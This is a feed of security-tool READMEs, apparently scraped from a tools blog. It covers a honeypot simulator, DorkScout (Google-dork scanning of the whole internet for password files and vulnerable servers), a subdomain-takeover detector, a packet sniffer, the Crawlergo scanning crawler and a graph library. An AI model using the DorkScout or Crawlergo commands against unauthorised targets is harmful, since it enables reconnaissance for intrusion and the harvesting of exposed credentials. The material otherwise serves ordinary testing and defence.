๐Ÿ”’
There are new articles available, click to refresh the page.
Before yesterdayTools

Fapro - Free, Cross-platform, Single-file mass network protocol server simulator

17 October 2021 at 20:30
By: Zion3R


FaPro is a Fake Protocol Server tool, Can easily start or stop multiple network services.

The goal is to support as many protocols as possible, and support as many deep interactions as possible for each protocol.


Features
  • Supported Running Modes:
    • Local Machine
    • Virtual Network
  • Supported Protocols:
    • DNS
    • DCE/RPC
    • EIP
    • Elasticsearch
    • FTP
    • HTTP
    • IEC 104
    • Memcached
    • Modbus
    • MQTT
    • MySQL
    • RDP
    • Redis
    • S7
    • SMB
    • SMTP
    • SNMP
    • SSH
    • Telnet
    • VNC
    • IMAP
    • POP3
  • Use TcpForward to forward network traffic
  • Support tcp syn logging

Protocol simulation demos

Rdp

Support credssp ntlmv2 nla authentication.

Support to configure the image displayed when user login.


SSH

Support user login.

Support fake terminal commands, such as id, uid, whoami, etc.

Account format: username:password:home:uid


IMAP & SMTP

Support user login and interaction.



Mysql

Support sql statement query interaction



HTTP

Support website clone, You need to install the chrome browser and chrome driver to work.


Quick Start

Generate Config

The configuration of all protocols and parameters is generated by genConfig subcommand.

Use 172.16.0.0/16 subnet to generate the configuration file:

fapro genConfig -n 172.16.0.0/16 > fapro.json

Or use local address instead of the virtual network:

fapro genConfig > fapro.json

Run the protocol simulator

Run FaPro in verbose mode and start the web service on port 8080:

fapro run -v -l :8080

Tcp syn logging

For windows users, please install winpcap or npcap.


Log analysis

Use ELK to analyze protocol logs:



Configuration

This section contains the sample configuration used by FaPro.

{
"version": "0.38",
"network": "127.0.0.1/32",
"network_build": "localhost",
"storage": null,
"geo_db": "/tmp/geoip_city.mmdb",
"hostname": "fapro1",
"use_logq": true,
"cert_name": "unknown",
"syn_dev": "any",
"exclusions": [],
"hosts": [
{
"ip": "127.0.0.1",
"handlers": [
{
"handler": "dcerpc",
"port": 135,
"params": {
"accounts": [
"administrator:123456",
],
"domain_name": "DESKTOP-Q1Test"
}
}
]
}
]
}
  • version: Configuration version.
  • network: The subnet used by the virtual network or the address bound to the local machine(Local mode).
  • network_build: Network mode(supported value: localhost, all, userdef)
    • localhost: Local mode, all services are listening on the local machine
    • all: Create all hosts in the subnet(i.e., Can ping all the host in the subnet)
    • userdef: Create only the hosts specified in the hosts configuration.
  • storage: Specify the storage used for log collection, support sqlite, mysql, elasticsearch. e.g.
  • geo_db: MaxMind geoip2 database file path, used to generate ip geographic location information. if you use Elasticsearch storage, never need this field, it will be automatically generated using the geoip processor of Elasticsearch.
  • hostname: Specify the host field in the log.
  • use_logq: Use local disk message queue to save logs, and then send it to remote mysql or Elasticsearch to prevent remote log loss.
  • cert_name: Common name of the generated certificate.
  • syn_dev: Specify the network interface used to capture tcp syn packets. If it is empty, the tcp syn packet will not be recorded. On windows, the device name is like "\Device\NPF_{xxxx-xxxx}".
  • exclusions: Exclude remote ips from logs.
  • hosts: Each item is a host configuration.
  • handlers: Service configuration, the service configured on the host, each item is a service configuration.
  • handler: Service name (i.e., protocol name)
  • params: Set the parameters supported by the service.

Example

Create a virtual network, The subnet is 172.16.0.0/24, include 2 hosts,

172.16.0.3 run dns, ssh service,

and 172.16.0.5 run rpc, rdp service,

protocol access logs are saved to elasticsearch, exclude the access log of 127.0.0.1.

{
"version": "0.38",
"network": "172.16.0.0/24",
"network_build": "userdef",
"storage": "es://http://127.0.0.1:9200",
"use_logq": true,
"cert_name": "unknown",
"syn_dev": "any",
"geo_db": "",
"exclusions": ["127.0.0.1"],
"hosts": [
{
"ip": "172.16.0.3",
"handlers": [
{
"handler": "dns",
"port": 53,
"params": {
"accounts": [
"admin:123456"
],
"appname": "domain"
}
},
{
"handler": "ssh",
"port": 22,
"params": {
"accounts": [
"root:5555555:/root:0"
],
"prompt": "$ ",
"server_version": "SSH-2.0-OpenSSH_7.4"
}
}
]
},
{
"ip": "172.16.0.5",
"handlers": [
{
"handler": "dcerpc",
"port": 135,
"params": {
"accounts": [
"administrator:123456"
],
"domain_name": "DESKTOP-Q1Test"
}
},
{
"handler": "rdp",
"port": 3389,
"params": {
"accounts": [
"administrator:123456"
],
"auth": false,
"domain_name": "DESKTOP-Q1Test",
"image": "rdp.jpg",
"sec_layer": "auto"
}
}
]
}
]
}

FAQ

We have collected some frequently asked questions. Before reporting an issue, please search if the FAQ has the answer to your problem.


Contributing
  • Issues are welcome.


DorkScout - Golang Tool To Automate Google Dork Scan Against The Entiere Internet Or Specific Targets

17 October 2021 at 11:30
By: Zion3R


dokrscout is a tool to automate the finding of vulnerable applications or secret files around the internet throught google searches, dorkscout first starts by fetching the dorks lists from https://www.exploit-db.com/google-hacking-database and then it scans a given target or everything it founds


Installation

dorkscout can be installed in different ways:


Go Packages

throught Golang Packages (golang package manager)

go get github.com/R4yGM/dorkscout

this will work for every platform


Docker

if you don't have docker installed you can follow their guide

first of all you have to pull the docker image (only 17.21 MB) from the docker registry, you can see it here, if you don't want to pull the image you can also clone the repository and then build the image from the Dockerfile

docker pull r4yan/dorkscout:latest

if you don't want to pull the image you can download or copy the dorkscout Dockerfile that can be found here and then build the image from the Dockerfile

then if you want to launch the container you have to first create a volume to share your files to the container

docker volume create --name dorkscout_data

using docker when you launch the container it will automatically install the dork lists inside a directory called "dorkscout" :

Vulnerability Data.dorkscout' -rw-r--r-- 1 r4yan r4yan 49048 Jul 31 14:56 'Pages Containing Login Portals.dorkscout' -rw-r--r-- 1 r4yan r4yan 16112 Jul 31 14:56 'Sensitive Directories.dorkscout' -rw-r--r-- 1 r4yan r4yan 451 Jul 31 14:56 'Sensitive Online Shopping Info.dorkscout' -rw-r--r-- 1 r4yan r4yan 29938 Jul 31 14:56 'Various Online Devices.dorkscout' -rw-r--r-- 1 r4yan r4yan 2802 Jul 31 14:56 'Vulnerable Files.dorkscout' -rw-r--r-- 1 r4yan r4yan 4925 Jul 31 14:56 'Vulnerable Servers.dorkscout' -rw-r--r-- 1 r4yan r4yan 8145 Jul 31 14:56 'Web Server Detection.dorkscout' ">
-rw-r--r-- 1 r4yan r4yan   110 Jul 31 14:56  .dorkscout
-rw-r--r-- 1 r4yan r4yan 79312 Aug 10 20:30 'Advisories and Vulnerabilities.dorkscout'
-rw-r--r-- 1 r4yan r4yan 6352 Jul 31 14:56 'Error Messages.dorkscout'
-rw-r--r-- 1 r4yan r4yan 38448 Jul 31 14:56 'Files Containing Juicy Info.dorkscout'
-rw-r--r-- 1 r4yan r4yan 17110 Jul 31 14:56 'Files Containing Passwords.dorkscout'
-rw-r--r-- 1 r4yan r4yan 1879 Jul 31 14:56 'Files Containing Usernames.dorkscout'
-rw-r--r-- 1 r4yan r4yan 5398 Jul 31 14:56 Footholds.dorkscout
-rw-r--r-- 1 r4yan r4yan 5568 Jul 31 14:56 'Network or Vulnerability Data.dorkscout'
-rw-r--r-- 1 r4yan r4yan 49048 Jul 31 14:56 'Pages Containing Login Portals.dorkscout'
-rw-r--r-- 1 r4yan r4yan 16112 Jul 31 14:56 'Sensitive Directories.dorkscout'
-rw-r--r-- 1 r4yan r4yan 451 Jul 31 14:56 'Sensitive Online Shopping Info.dorkscout'
-rw-r--r-- 1 r4yan r4yan 29938 Jul 31 14:56 'Various Online Devices.dorkscout'
-rw-r--r-- 1 r4yan r4yan 2802 Jul 31 14:56 'Vulnerable Files.dorkscout'
-rw-r--r-- 1 r4yan r4yan 4925 Jul 31 14:56 'Vulnerable Servers.dorkscout'
-rw-r--r-- 1 r4yan r4yan 8145 Jul 31 14:56 'Web Server Detection.dorkscout'

so that you don't have to install them then you can start scanning by doing :

docker run -v Dorkscout:/dorkscout r4yan/dorkscout scan <options>

replace the <options> with the options/arguments you want to give to dorkscout, example :

docker run -v dorkscout_data:/dorkscout r4yan/dorkscout scan -d="/dorkscout/Sensitive Online Shopping Info.dorkscout" -H="/dorkscout/a.html"

If you wanted to scan throught a proxy using a docker container you have to add the --net host optionexample :

docker run --net host -v dorkscout_data:/dorkscout r4yan/dorkscout scan -d="/dorkscout/Sensitive Online Shopping Info.dorkscout" -H="/dorkscout/a.html -x socks5://127.0.0.1:9050"

Always save your results inside the volume and not in the container because then the results will be deleted! you can save them by writing the same volume path of the directory you are saving the results

if you added this and did everything correctly at the end of every scan you'd find the results inside the folder /var/lib/docker/volumes/dorkscout_data/_data

this will work for every platform


Executable

you can also download the already compiled binaries here and then execute them


Usage
dorkscout -h
Usage:
dorkscout [command]

Available Commands:
completion generate the autocompletion script for the specified shell
delete deletes all the .dorkscout files inside a given directory
help Help about any command
install installs a list of dorks from exploit-db.com
scan scans a specific website or all the websites it founds for a list of dorks

Flags:
-h, --help help for dorkscout

Use "dorkscout [command] --help" for more information about a command.

to start scanning with a wordlist and a proxy that will then return the results in a HTML format

dorkscout scan -d="/dorkscout/Sensitive Online Shopping Info.dorkscout" -H="/dorkscout/a.html" -x socks5://127.0.0.1:9050

results :



Install wordlists

to start scanning you'll need some dork lists and to have these lists you can install them through the install command

dorkscout install --output-dir /dorks

and this will fetch all the available dorks from exploit.db

[+] ./Advisories and Vulnerabilities.dorkscout
[+] ./Vulnerable Files.dorkscout
[+] ./Files Containing Juicy Info.dorkscout
[+] ./Sensitive Online Shopping Info.dorkscout
[+] ./Files Containing Passwords.dorkscout
[+] ./Vulnerable Servers.dorkscout
[+] ./Various Online Devices.dorkscout
[+] ./Pages Containing Login Portals.dorkscout
[+] ./Footholds.dorkscout
[+] ./Error Messages.dorkscout
[+] ./Files Containing Usernames.dorkscout
[+] ./Network or Vulnerability Data.dorkscout
[+] ./.dorkscout
[+] ./Sensitive Directories.dorkscout
[+] ./Web Server Detection.dorkscout
2021/08/11 19:02:45 Installation finished in 2.007928 seconds on /dorks


Domain-Protect - Protect Against Subdomain Takeover

16 October 2021 at 20:30
By: Zion3R


Protect Against Subdomain Takeover

  • scans Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP

deploy to security audit account



scan your entire AWS Organization



receive alerts by Slack or email



or manually scan from your laptop



subdomain detection functionality

Scans Amazon Route53 to identify:

  • Alias records for CloudFront distributions with missing S3 origin
  • CNAME records for CloudFront distributions with missing S3 origin
  • ElasticBeanstalk Alias records vulnerable to takeover
  • ElasticBeanstalk CNAMES vulnerable to takeover
  • Registered domains with missing hosted zones
  • Subdomain NS delegations vulnerable to takeover
  • S3 Alias records vulnerable to takeover
  • S3 CNAMES vulnerable to takeover
  • Vulnerable CNAME records for Azure resources
  • CNAME records for missing Google Cloud Storage buckets

optional additional check

Turned off by default as it may result in Lambda timeouts for large organisations

  • A records for missing storage buckets, e.g. Google Cloud Load Balancer with missing backend storage

To enable, create this Terraform variable in your tfvars file or CI/CD pipeline:

lambdas = ["alias-cloudfront-s3", "alias-eb", "alias-s3", "cname-cloudfront-s3", "cname-eb", "cname-s3", "ns-domain", "ns-subdomain", "cname-azure", "cname-google", "a-storage"]

options
  1. scheduled lambda functions with email and Slack alerts, across an AWS Organization, deployed using Terraform
  2. manual scans run from your laptop or CloudShell, in a single AWS account

notifications
  • Slack channel notification per vulnerability type, listing account names and vulnerable domains
  • Email notification in JSON format with account names, account IDs and vulnerable domains by subscribing to SNS topic

requirements
  • Security audit account within AWS Organizations
  • Security audit read-only role with an identical name in every AWS account of the Organization
  • Storage bucket for Terraform state file
  • Terraform 1.0.x

usage
  • replace the Terraform state S3 bucket fields in the command below as appropriate
  • for local testing, duplicate terraform.tfvars.example, rename without the .example suffix
  • enter details appropriate to your organization and save
  • alternatively enter Terraform variables within your CI/CD pipeline
terraform init -backend-config=bucket=TERRAFORM_STATE_BUCKET -backend-config=key=TERRAFORM_STATE_KEY -backend-config=region=TERRAFORM_STATE_REGION
terraform workspace new dev
terraform plan
terraform apply

AWS IAM policies

For least privilege access control, example AWS IAM policies are provided:


adding new checks
  • create a new subdirectory within the terraform-modules/lambda/code directory
  • add Python code file with same name as the subdirectory
  • add the name of the file without extension to var.lambdas in variables.tf
  • add a subdirectory within the terraform-modules/lambda/build directory, following the existing naming pattern
  • add a .gitkeep file into the new directory
  • update the .gitignore file following the pattern of existing directories
  • apply Terraform

adding notifications to extra Slack channels
  • add an extra channel to your slack_channels variable list
  • add an extra webhook URL or repeat the same webhook URL to your slack_webhook_urls variable list
  • apply Terraform

testing
  • use multiple Terraform workspace environments, e.g. dev, prd
  • use the slack_channels_dev variable for your dev environment to notify a test Slack channel
  • for new subdomain takeover categories, create correctly configured and vulnerable domain names in Route53
  • minimise the risk of malicious takeover by using a test domain, with domain names which are hard to enumerate
  • remove any vulnerable domains as soon as possible

ci/cd
  • infrastructure has been deployed using CircleCI
  • environment variables to be entered in CircleCI project settings:
ENVIRONMENT VARIABLE EXAMPLE VALUE / COMMENT
AWS_ACCESS_KEY_ID using domain-protect deploy policy
AWS_SECRET_ACCESS_KEY -
TERRAFORM_STATE_BUCKET tfstate48903
TERRAFORM_STATE_KEY domain-protect
TERRAFORM_STATE_REGION us-east-1
TF_VAR_org_primary_account 012345678901
TF_VAR_security_audit_role_name not needed if "domain-protect-audit" used
TF_VAR_external_id only required if External ID is configured
TF_VAR_slack_channels ["security-alerts"]
TF_VAR_slack_channels_dev ["security-alerts-dev"]
TF_VAR_slack_webhook_urls ["https://hooks.slack.com/services/XXX/XXX/XXX"]
  • to validate an updated CircleCI configuration:
docker run -v `pwd`:/whatever circleci/circleci-cli circleci config validate /whatever/.circleci/config.yml

limitations
  • this tool cannot guarantee 100% protection against subdomain takeover
  • it currently only scans Amazon Route53, and only checks a limited number of takeover types
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP






Packet-Sniffer - A pure-Python Network Packet Sniffing Tool

16 October 2021 at 11:30
By: Zion3R


A simple pure-Python network packet sniffer. Packets are disassembled as they arrive at a given network interface controller and their information is displayed on the screen.

This application maintains no dependencies on third-party modules and can be run by any Python 3.x interpreter.


Installation

GNU / Linux

Simply clone this repository with git clone and execute the packet_sniffer.py file as described in the following Usage section.

[email protected]:~/DIR$ git clone https://github.com/EONRaider/Packet-Sniffer.git

Other Systems

This project is dependent on PF_PACKET - a stateful packet filter not found on Windows or Mac OS X. For demonstration purposes, you can try out this package in a Docker container. Although it will not have full access to localhost on your machine, you can still sniff on the Docker subnet and at least get the module running.

Use this command to build and run from the project directory:

docker build -t sniff . && docker run --network host sniff

Note that the entry command is simply python packet_sniffer.py, so feel free to use the full functionality of the module by overriding the default command. Remember that we tagged the container with the name "sniff" before, so we can pass command-line arguments to the sniffer in the following manner:

docker run --network host sniff [your command goes here]
echo "Now let's print help"
docker run --network host sniff python packet_sniffer.py --help

Usage of --network host is not supported on OS X or Windows so this container won't be fully functional - but you will see packets traveling within the docker subnet.


Usage
packet_sniffer.py [-h] [-i INTERFACE] [-d]

A pure-Python network packet sniffer.

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Interface from which packets will be captured (captures
from all available interfaces by default).
-d, --displaydata Output packet data during capture.

Running the Application
Objective Initiate the capture of packets on all available interfaces
Execution sudo python3 packet_sniffer.py
Outcome Refer to sample output below
  • Sample output:
[>] Packet #476 at 17:45:13:
[+] MAC ......ae:45:39:30:8f:5a -> dc:d9:ae:71:c8:b9
[+] IPv4 ..........192.168.1.65 -> 140.82.113.3 | PROTO: TCP TTL: 64
[+] TCP ..................40820 -> 443 | Flags: 0x010 > ACK
[>] Packet #477 at 17:45:14:
[+] MAC ......dc:d9:ae:71:c8:b9 -> ae:45:39:30:8f:5a
[+] IPv4 ..........140.82.113.3 -> 192.168.1.65 | PROTO: TCP TTL: 49
[+] TCP ....................443 -> 40820 | Flags: 0x010 > ACK
[>] Packet #478 at 17:45:18:
[+] MAC ......dc:d9:ae:71:c8:b9 -> ae:45:39:30:8f:5a
[+] ARP Who has 192.168.1.65 ? -> Tell 192.168.1.254
[>] Packet #479 at 17:45:18:
[+] MAC ......ae:45:39:30:8f:5a -> dc:d9:ae:71:c8:b9
[+] ARP ...........192.168.1.65 -> Is at ae:45:39:30:8f:5a

Legal Disclaimer

The use of code contained in this repository, either in part or in its totality, for engaging targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.

Developers assume no liability and are not responsible for misuses or damages caused by any code contained in this repository in any event that, accidentally or otherwise, it comes to be utilized by a threat agent or unauthorized entity as a means to compromise the security, privacy, confidentiality, integrity, and/or availability of systems and their associated resources by leveraging the exploitation of known or unknown vulnerabilities present in said systems, including, but not limited to, the implementation of security controls, human- or electronically-enabled.

The use of this code is only endorsed by the developers in those circumstances directly related to educational environments or authorized penetration testing engagements whose declared purpose is that of finding and mitigating vulnerabilities in systems, limiting their exposure to compromises and exploits employed by malicious agents as defined in their respective threat models.



Crawlergo - A Powerful Browser Crawler For Web Vulnerability Scanners

15 October 2021 at 20:30
By: Zion3R


crawlergo is a browser crawler that uses chrome headless mode for URL collection. It hooks key positions of the whole web page with DOM rendering stage, automatically fills and submits forms, with intelligent JS event triggering, and collects as many entries exposed by the website as possible. The built-in URL de-duplication module filters out a large number of pseudo-static URLs, still maintains a fast parsing and crawling speed for large websites, and finally gets a high-quality collection of request results.

crawlergo currently supports the following features:

  • chrome browser environment rendering
  • Intelligent form filling, automated submission
  • Full DOM event collection with automated triggering
  • Smart URL de-duplication to remove most duplicate requests
  • Intelligent analysis of web pages and collection of URLs, including javascript file content, page comments, robots.txt files and automatic Fuzz of common paths
  • Support Host binding, automatically fix and add Referer
  • Support browser request proxy
  • Support pushing the results to passive web vulnerability scanners

Installation

Please read and confirm disclaimer carefully before installing and usingใ€‚

Build

cd crawlergo/cmd/crawlergo
go build crawlergo_cmd.go
  1. crawlergo relies only on the chrome environment to run, go to download for the new version of chromium, or just click to download Linux version 79.
  2. Go to download page for the latest version of crawlergo and extract it to any directory. If you are on linux or macOS, please give crawlergo executable permissions (+x).
  3. Or you can modify the code and build it yourself.

If you are using a linux system and chrome prompts you with missing dependencies, please see TroubleShooting below


Quick Start

Go๏ผ

Assuming your chromium installation directory is /tmp/chromium/, set up 10 tabs open at the same time and crawl the testphp.vulnweb.com:

./crawlergo -c /tmp/chromium/chrome -t 10 http://testphp.vulnweb.com/

Using Proxy
./crawlergo -c /tmp/chromium/chrome -t 10 --request-proxy socks5://127.0.0.1:7891 http://testphp.vulnweb.com/

Calling crawlergo with python

By default, crawlergo prints the results directly on the screen. We next set the output mode to json, and the sample code for calling it using python is as follows:

#!/usr/bin/python3
# coding: utf-8

import simplejson
import subprocess


def main():
target = "http://testphp.vulnweb.com/"
cmd = ["./crawlergo", "-c", "/tmp/chromium/chrome", "-o", "json", target]
rsp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = rsp.communicate()
# "--[Mission Complete]--" is the end-of-task separator string
result = simplejson.loads(output.decode().split("--[Mission Complete]--")[1])
req_list = result["req_list"]
print(req_list[0])


if __name__ == '__main__':
main()

Crawl Results

When the output mode is set to json, the returned result, after JSON deserialization, contains four parts:

  • all_req_list๏ผš All requests found during this crawl task, containing any resource type from other domains.
  • req_list๏ผšReturns the current domain results of this crawl task, pseudo-statically de-duplicated, without static resource links. It is a subset of all_req_list .
  • all_domain_list๏ผšList of all domains found.
  • sub_domain_list๏ผšList of subdomains found.

Examples

crawlergo returns the full request and URL, which can be used in a variety of ways:

  • Used in conjunction with other passive web vulnerability scanners

    First, start a passive scanner and set the listening address to: http://127.0.0.1:1234/

    Next, assuming crawlergo is on the same machine as the scanner, start crawlergo and set the parameters:

    --push-to-proxy http://127.0.0.1:1234/

  • Host binding (not available for high version chrome) (example)

  • Custom Cookies (example)

  • Regularly clean up zombie processes generated by crawlergo (example) , contributed by @ring04h


Bypass headless detect

crawlergo can bypass headless mode detection by default.

https://intoli.com/blog/not-possible-to-block-chrome-headless/chrome-headless-test.html


ย 

TroubleShooting
  • 'Fetch.enable' wasn't found

    Fetch is a feature supported by the new version of chrome, if this error occurs, it means your version is too low, please upgrade the chrome version.

  • chrome runs with missing dependencies such as xxx.so

    // Ubuntu
    apt-get install -yq --no-install-recommends \
    libasound2 libatk1.0-0 libc6 libcairo2 libcups2 libdbus-1-3 \
    libexpat1 libfontconfig1 libgcc1 libgconf-2-4 libgdk-pixbuf2.0-0 libglib2.0-0 libgtk-3-0 libnspr4 \
    libpango-1.0-0 libpangocairo-1.0-0 libstdc++6 libx11-6 libx11-xcb1 libxcb1 \
    libxcursor1 libxdamage1 libxext6 libxfixes3 libxi6 libxrandr2 libxrender1 libxss1 libxtst6 libnss3

    // CentOS 7
    sudo yum install pango.x86_64 libXcomposite.x86_64 libXcursor.x86_64 libXdamage.x86_64 libXext.x86_64 libXi.x86_64 \
    libXtst.x86_64 cups-libs.x86_64 libXScrnSaver.x86_64 libXrandr.x86_64 GConf2.x86_64 alsa-lib.x86_64 atk.x86_64 gtk3.x86_64 \
    ipa-gothic-fonts xorg-x11-fonts-100dpi xorg-x11-fonts-75dpi xorg-x11-utils xorg-x11-fonts-cyrillic xorg-x11-fonts-Type1 xorg-x11-fonts-misc -y

    sudo yum update nss -y
  • Run prompt Navigation timeout / browser not found / don't know correct browser executable path

    Make sure the browser executable path is configured correctly, type: chrome://version in the address bar, and find the executable file path:


Parameters

Required parameters
  • --chromium-path Path, -c Path The path to the chrome executable. (Required)

Basic parameters
  • --custom-headers Headers Customize the HTTP header. Please pass in the data after JSON serialization, this is globally defined and will be used for all requests. (Default: null)
  • --post-data PostData, -d PostData POST data. (Default: null)
  • --max-crawled-count Number, -m Number The maximum number of tasks for crawlers to avoid long crawling time due to pseudo-static. (Default: 200)
  • --filter-mode Mode, -f Mode Filtering mode, simple: only static resources and duplicate requests are filtered. smart: with the ability to filter pseudo-static. strict: stricter pseudo-static filtering rules. (Default: smart)
  • --output-mode value, -o value Result output mode, console: print the glorified results directly to the screen. json: print the json serialized string of all results. none: don't print the output. (Default: console)
  • --output-json filepath Write the result to the specified file after JSON serializing it. (Default: null)
  • --request-proxy proxyAddress socks5 proxy address, all network requests from crawlergo and chrome browser are sent through the proxy. (Default: null)

Expand input URL
  • --fuzz-path Use the built-in dictionary for path fuzzing. (Default: false)
  • --fuzz-path-dict Customize the Fuzz path by passing in a dictionary file path, e.g. /home/user/fuzz_dir.txt, each line of the file represents a path to be fuzzed. (Default: null)
  • --robots-path Resolve the path from the /robots.txt file. (Default: false)

Form auto-fill
  • --ignore-url-keywords, -iuk URL keyword that you don't want to visit, generally used to exclude logout links when customizing cookies. Usage: -iuk logout -iuk exit. (default: "logout", "quit", "exit")
  • --form-values, -fv Customize the value of the form fill, set by text type. Support definition types: default, mail, code, phone, username, password, qq, id_card, url, date and number. Text types are identified by the four attribute value keywords id, name, class, type of the input box label. For example, define the mailbox input box to be automatically filled with A and the password input box to be automatically filled with B, -fv mail=A -fv password=B.Where default represents the fill value when the text type is not recognized, as "Cralwergo". (Default: Cralwergo)
  • --form-keyword-values, -fkv Customize the value of the form fill, set by keyword fuzzy match. The keyword matches the four attribute values of id, name, class, type of the input box label. For example, fuzzy match the pass keyword to fill 123456 and the user keyword to fill admin, -fkv user=admin -fkv pass=123456. (Default: Cralwergo)

Advanced settings for the crawling process
  • --incognito-context, -i Browser start incognito mode. (Default: true)
  • --max-tab-count Number, -t Number The maximum number of tabs the crawler can open at the same time. (Default: 8)
  • --tab-run-timeout Timeout Maximum runtime for a single tab page. (Default: 20s)
  • --wait-dom-content-loaded-timeout Timeout The maximum timeout to wait for the page to finish loading. (Default: 5s)
  • --event-trigger-interval Interval The interval when the event is triggered automatically, generally used in the case of slow target network and DOM update conflicts that lead to URL miss capture. (Default: 100ms)
  • --event-trigger-mode Value DOM event auto-triggered mode, with async and sync, for URL miss-catching caused by DOM update conflicts. (Default: async)
  • --before-exit-delay Delay exit to close chrome at the end of a single tab task. Used to wait for partial DOM updates and XHR requests to be captured. (Default: 1s)

Other
  • --push-to-proxy The listener address of the crawler result to be received, usually the listener address of the passive scanner. (Default: null)
  • --push-pool-max The maximum number of concurrency when sending crawler results to the listening address. (Default: 10)
  • --log-level Logging levels, debug, info, warn, error and fatal. (Default: info)
  • --no-headless Turn off chrome headless mode to visualize the crawling process. (Default: false)

Follow me

Weibo๏ผš@9ian1i Twitter: @9ian1i

Related articles๏ผšA browser crawler practice for web vulnerability scanning



Networkit - A Growing Open-Source Toolkit For Large-Scale Network Analysis

15 October 2021 at 11:30
By: Zion3R



NetworKit is an open-source tool suite for high-performance network analysis. Its aim is to provide tools for the analysis of large networks in the size range from thousands to billions of edges. For this purpose, it implements efficient graph algorithms, many of them parallel to utilize multicore architectures. These are meant to compute standard measures of network analysis. NetworKit is focused on scalability and comprehensiveness. NetworKit is also a testbed for algorithm engineering and contains novel algorithms from recently published research (see list of publications below).

NetworKit is a Python module. High-performance algorithms are written in C++ and exposed to Python via the Cython toolchain. Python in turn gives us the ability to work interactively and a rich environment of tools for data analysis and scientific computing. Furthermore, NetworKit's core can be built and used as a native library if needed.


Requirements

You will need the following software to install NetworKit as a python package:

  • A modern C++ compiler, e.g.: g++ (>= 6.1), clang++ (>= 3.9) or MSVC (>= 14.13)
  • OpenMP for parallelism (usually ships with the compiler)
  • Python3 (3.6 or higher is supported)
    • Development libraries for Python3. The package name depends on your distribution. Examples:
      • Debian/Ubuntu: apt-get install python3-dev
      • RHEL/CentOS: dnf install python3-devel
      • Windows: Use the official release installer from www.python.org
  • Pip
  • CMake version 3.6 or higher (Advised to use system packages if available. Alternative: pip3 install cmake)
  • Build system: Make or Ninja
  • Cython version 0.29 or higher (e.g., pip3 install cython)

Install

In order to use NetworKit, you can either install it via package managers or build the Python module from source.


Install via package manager

While the most recent version is in general available for all package managers, the number of older downloadable versions differ.


pip
pip3 install [--user] networkit

conda (channel conda-forge)
conda config --add channels conda-forge
conda install networkit [-c conda-forge]

brew
brew install networkit

spack
spack install py-networkit

Building the Python module from source
git clone https://github.com/networkit/networkit networkit
cd networkit
python3 setup.py build_ext [-jX]
pip3 install -e .

The script will call cmake and ninja (make as fallback) to compile NetworKit as a library, build the extensions and copy it to the top folder. By default, NetworKit will be built with the amount of available cores in optimized mode. It is possible the add the option -jN the number of threads used for compilation.


Usage example

To get an overview and learn about NetworKit's different functions/classes, have a look at our interactive notebooks-section, especially the Networkit UserGuide. Note: To view and edit the computed output from the notebooks, it is recommended to use Jupyter Notebook. This requires the prior installation of NetworKit. You should really check that out before start working on your network analysis.

We also provide a Binder-instance of our notebooks. To access this service, you can either click on the badge at the top or follow this link. Disclaimer: Due to rebuilds of the underlying image, it can takes some time until your Binder instance is ready for usage.

If you only want to see in short how NetworKit is used - the following example provides a climpse at that. Here we generate a random hyperbolic graph with 100k nodes and compute its communities with the PLM method:

>>> import networkit as nk
>>> g = nk.generators.HyperbolicGenerator(1e5).generate()
>>> communities = nk.community.detectCommunities(g, inspect=True)
PLM(balanced,pc,turbo) detected communities in 0.14577102661132812 [s]
solution properties:
------------------- -----------
# communities 4536
min community size 1
max community size 2790
avg. community size 22.0459
modularity 0.987243
------------------- -----------

Install the C++ Core only

In case you only want to work with NetworKit's C++ core, you can either install it via package managers or build it from source.


Install C++ core via package manager

conda (channel conda-forge)
conda config --add channels conda-forge
conda install libnetworkit [-c conda-forge]

brew
brew install libnetworkit

spack
spack install libnetworkit

Building the C++ core from source

We recommend CMake and your preferred build system for building the C++ part of NetworKit.

The following description shows how to use CMake in order to build the C++ Core only:

First you have to create and change to a build directory: (in this case named build)

mkdir build
cd build

Then call CMake to generate files for the make build system, specifying the directory of the root CMakeLists.txt file (e.g., ..). After this make is called to start the build process:

cmake ..
make -jX

To speed up the compilation with make a multi-core machine, you can append -jX where X denotes the number of threads to compile with.


Use NetworKit as a library

This paragraph explains how to use the NetworKit core C++ library in case it has been built from source. For how to use it when installed via package managers, best refer to the official documentation (brew, conda, spack).

In order to use the previous compiled networkit library, you need to have it installed, and link it while compiling your project. Use these instructions to compile and install NetworKit in /usr/local:

cmake ..
make -jX install

Once NetworKit has been installed, you can use include directives in your C++-application as follows:

#include <networkit/graph/Graph.hpp>

You can compile your source as follows:

g++ my_file.cpp -lnetworkit

Unit tests

Building and running NetworKit unit tests is not mandatory. However, as a developer you might want to write and run unit tests for your code, or if you experience any issues with NetworKit, you might want to check if NetworKit runs properly. The unit tests can only be run from a clone or copy of the repository and not from a pip installation. In order to run the unit tests, you need to compile them first. This is done by setting the CMake NETWORKI_BUILD_TESTS flag to ON:

cmake -DNETWORKIT_BUILD_TESTS=ON ..

Unit tests are implemented using GTest macros such as TEST_F(CentralityGTest, testBetweennessCentrality). Single tests can be executed with:

./networkit_tests --gtest_filter=CentralityGTest.testBetweennessCentrality

Additionally, one can specify the level of the logs outputs by adding --loglevel <log_level>; supported log levels are: TRACE, DEBUG, INFO, WARN, ERROR, and FATAL.


Compiling with address/leak sanitizers

Sanitizers are great tools to debug your code. NetworKit provides additional Cmake flags to enable address, leak, and undefined behavior sanitizers. To compile your code with sanitizers, set the CMake NETWORKIT_WITH_SANITIZERS to either address or leak:

cmake -DNETWORKIT_WITH_SANITIZERS=leak ..

By setting this flag to address, your code will be compiled with the address and the undefined sanitizers. Setting it to leak also adds the leak sanitizer.


Documentation

The most recent version of the documentation can be found online.


Contact

For questions regarding NetworKit, have a look at our issues-section and see if there is already an open discussion. If not feel free to open a new issue. To stay updated about this project, subscribe to our mailing list.


Contributions

We encourage contributions to the NetworKit source code. See the development guide for instructions. For support please contact the mailing list.


Credits

List of contributors can be found on the NetworKit website credits page.


External Code

The program source includes:


License

The source code of this program is released under the MIT License. We ask you to cite us if you use this code in your project (c.f. the publications section below and especially the technical report). Feedback is also welcome.


Publications

The NetworKit publications page lists the publications on NetworKit as a toolkit, on algorithms available in NetworKit, and simply using NetworKit. We ask you to cite the appropriate ones if you found NetworKit useful for your own research.



